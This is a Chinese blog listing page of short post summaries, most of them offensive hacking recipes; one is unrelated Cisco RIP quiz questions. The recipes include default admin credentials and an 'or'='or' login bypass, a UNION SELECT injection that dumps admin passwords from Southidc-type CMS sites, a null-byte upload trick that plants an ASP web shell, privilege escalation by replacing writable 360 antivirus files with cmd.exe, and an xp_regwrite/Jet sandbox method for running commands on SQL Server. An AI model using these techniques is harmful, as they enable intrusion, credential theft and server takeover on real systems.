摘要：默认：admin adminadmin admin888'or'='or'默认数据库Databases/079lidc.mdb改样式上传:http://www.yangtong.com/admin/southidceditor/admin_style.asp抓包 明小子上传注:通杀南方数据 良精系统 网软天下等http://www.xxx.cn/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union selec 阅读全文

摘要：一、'\0'上传漏洞 + nc抓包上传:整个流程上传漏洞主要就是利用'\0'字符漏洞，'\0'字符在系统中被用作字符串结束的标志基本原理就是网络程序虽然禁止了.asp等后缀名文件的上传，但是都会允许.jpg或者.gif格式文件的上传。这样如果自己构造数据包 formPath=UploadFile/shell.asp'\0 '.jpg，那么'\0 '后面的字符将被截断，原因是计算机遇到'\0'字符，认为字符串结束了。于是我们就向服务器上传了一个名为shell.asp的ASP木马程序，后面的就不多说了， 阅读全文

摘要：1请参见图示。 网络管理员已按图示配置了 R1，并且所有接口都运作正常。 但从 R1 ping 172.16.1.1 时失败。 造成此问题的原因可能是什么？R1 上的串行接口配置有误。默认路由配置有误。必须在 R1 上发出 default-information originate 命令。必须在 R1 上禁用自动总结。2下列关于 RIPv1 协议的叙述，哪一项是正确的？是一种链路状态路由协议。路由更新中不包含子网信息。使用 DUAL 算法将备用路由插入拓扑表中。在路由器上使用无类路由作为默认的路由方式。3请参见图示。突出显示的值 2 表示什么意思？路由协议的管理距离。R2 到 192.168. 阅读全文

摘要：众所周知要成功提权星外主机就要找到可写可执行目录，可近来星外主机的目录设置越来越BT，几乎没有可写可执行目录。所以另一个“提权思路”出现了。寻找服务器上安装的第3方软件某些文件的权限问题来进行文件替换，将这些文件替换为我们的cmd.exe和cscript.exe来提权，经我测试发现以下服务器常用软件的某些文件权限为Everyone即为所有用户权限，可以修改，可以上传同文件名替换，删除，最重要的是还可以执行。首先是我们可爱的360杀毒。c:\Program Files\360\360Safe\AntiSection\mutex.db 360杀毒数据库文件c:\Program Files\360\ 阅读全文

摘要：sa下删除xp_cmdshell和xplog70.dll时候的一种办法，不算新的了，也被一些人不断的再次提出来，为了方便自己记忆再写出来，在这种情况下，要执行命令，条件是要有xp_regwrite。首先开启沙盘模式：exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Jet\4.0\Engines’,'SandBoxMode’,'REG_DWORD’,1然后利用jet.oledb执行系统命令select * from openrowset(‘microsoft.jet.oledb.4.0′, 阅读全文